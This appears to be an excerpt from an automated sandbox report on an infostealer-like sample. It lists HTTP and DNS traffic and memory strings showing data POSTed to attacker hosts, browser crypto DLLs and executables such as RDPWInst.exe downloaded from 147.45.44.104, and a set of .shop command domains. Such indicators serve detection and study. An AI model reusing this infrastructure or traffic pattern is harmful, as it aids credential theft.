Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JECAEHJJJKJKFIDGCBGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHIIDHCGHCAAAAAFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 6769Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5de72d9ebd_rdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJEGCBGIDGHIDHDGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3189Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_00406963

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5de72d9ebd_rdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ww.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: wallkedsleeoi.shop
Source: global traffic	DNS traffic detected: DNS query: gutterydhowi.shop
Source: global traffic	DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic	DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic	DNS traffic detected: DNS query: vozmeatillu.shop
Source: global traffic	DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic	DNS traffic detected: DNS query: fragnantbui.shop
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic	DNS traffic detected: DNS query: stogeneratmns.shop
Source: global traffic	DNS traffic detected: DNS query: reinforcenh.shop
Source: global traffic	DNS traffic detected: DNS query: ballotnwu.site
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: hansgborn.eu

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exe
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000011B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exe4
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000011B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exeN
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1222150http://147.45.44.104/prog/66f5db9e
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;
Source: RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeh
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5de72d9ebd_rdp.exe
Source: file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.0000000002514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000251E000.00000004.00000800.00020000.00000000.sdmp, JKEHIIJJEC.exe, 00000010.00000002.2514195438.0000000002514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000251E000.00000004.00000800.00020000.00000000.sdmp, JKEHIIJJEC.exe, 00000010.00000002.2514195438.0000000002514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, file.exe, KECGDBFCBK.exe.3.dr, softokn3.dll.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr, nss3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.GCAKJKECGCFI
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.ECGCFI
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/2
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/L
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgCFI
Source: file.exe, 00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoKECGCFI
Source: file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftM
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, file.exe, KECGDBFCBK.exe.3.dr, softokn3.dll.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000251E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hansgborn.eu
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000251E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hansgborn.eud
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, file.exe, KECGDBFCBK.exe.3.dr, softokn3.dll.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr, nss3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0
